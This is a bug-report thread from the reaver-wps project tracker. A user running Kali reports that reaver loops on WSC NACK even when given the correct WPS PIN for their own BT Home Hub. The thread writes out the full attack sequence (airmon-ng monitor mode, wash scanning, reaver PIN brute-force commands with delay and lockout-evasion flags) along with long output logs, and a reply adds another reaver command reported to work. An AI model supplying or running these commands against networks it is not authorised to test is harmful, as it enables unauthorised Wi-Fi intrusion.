slothg / reaver-wps

Automatically exported from code.google.com/p/reaver-wps

Supplied full pin but Reaver doesn't succeed #697

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
Hi All,

I am new to using Reaver, but have done a lot of reading and research into its 
use. I am trying to crack my own BT Home Hub 3b (UK). However, I am seeing some 
strange behaviour. Some background first:

WiFi Adapter - ALFA AWUS036NHA (Atheros AR9271) in monitor mode
Linux Version - Kali latest distro from Kali website (January 2015) kali-linux-1.0.9a 64bit
Reaver Version - 1.4

My router has WPS enabled and is not locked. I have run the following commands:

airmon-ng start wlan0
Kill 3 processes running (NetworkManager and 

wash -i mon0

BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
28:3C:E4:36:46:5F  11       -42   1.0          No          [NetworkName]

I then open a new terminal window and have tried the following few reaver 
commands (not at the same time).

Firstly, I tried to see if Reaver actually gets the WPA when I pass it the full 
known WPS pin. I ran it with the actual WPS pin using the following command:

 # reaver -i mon0 -c 11 -b 28:3C:E4:36:46:5F -d 5 -p 86890281  -vv

Output is this, it just loops for ages.. surely by giving it the full pin it 
should find it almost instantly?

 [+] Switching mon0 to channel 11
 [+] Waiting for beacon from 28:3C:E4:36:46:5F
 [+] Associated with 28:3C:E4:36:46:5F (ESSID: [NetworkName])
 [+] Trying pin 86890281
 [+] Sending EAPOL START request
 [+] Received identity request
 [+] Sending identity response
 [+] Received M1 message
 [+] Sending M2 message
 [+] Received M3 message
 [+] Sending M4 message
 [+] Received WSC NACK
 [+] Sending WSC NACK
 [+] Trying pin 86890281
 [+] Sending EAPOL START request
 [+] Received identity request
 [+] Sending identity response
 [+] Received M1 message
 [+] Sending M2 message
 [+] Received M3 message
 [+] Sending M4 message
 [+] Received WSC NACK
 [+] Sending WSC NACK
 [+] Trying pin 86890281
 [+] Sending EAPOL START request
 [+] Received identity request
 [+] Sending identity response
 [+] Received M1 message
 [+] Sending M2 message
 [+] Received M3 message
 [+] Sending M4 message
 [+] Received WSC NACK
 [+] Sending WSC NACK
 [+] Trying pin 86890281
 [+] Sending EAPOL START request
 [+] Received identity request
 [+] Sending identity response
 [+] Received M1 message
 [+] Sending M2 message
 [+] Received M3 message
 [+] Sending M4 message
 [+] Received WSC NACK
 [+] Sending WSC NACK

I then tried running Reaver using the following command (first 4 digits of the 
pin, and some extra options that proved successful for others):
reaver -i mon0 -c 11 -b 28:3C:E4:36:46:5F -d 5 -r 3:15 -x 360 -T .5 -S -N -t 10 -w -vv -L -p 8689

This went on for about 12 hours and got to 99.99% but just loops on the last 
pin (which is wrong):

 [+] Trying pin 86899987
 [+] Sending EAPOL START request
 [+] Received identity request
 [+] Sending identity response
 [+] Received M1 message
 [+] Sending M2 message
 [+] Received M3 message
 [+] Sending M4 message
 [+] Received WSC NACK
 [+] Sending WSC NACK
 [+] Trying pin 86899987
 [+] Sending EAPOL START request
 [+] Received identity request
 [+] Sending identity response
 [+] Received M1 message
 [+] Sending M2 message
 [+] Received M3 message
 [+] Sending M4 message
 [+] Received WSC NACK
 [+] Sending WSC NACK
 [+] 99.99% complete @ 2015-01-27 07:15:25 (7 seconds/pin)
 [+] Max time remaining at this rate: 0:00:07 (1 pins left to try)

Any ideas on what to try next?

I have read through the Wiki/Q&A but not got much further.

Sorry if this seems like a bit of a dumb problem, we all have to start 
somewhere..

Original issue reported on code.google.com by christop...@gmail.com on 27 Jan 2015 at 8:13

GoogleCodeExporter commented 9 years ago
I think I saw this command somewhere else. It appears to work 

reaver -i mon0 -a -b 55:44:33:22:11:00 -r 3:15 -E -S -vv -N -T 1 -t 20 -d 0 -x 30

Original comment by fraf...@gmail.com on 25 Feb 2015 at 9:44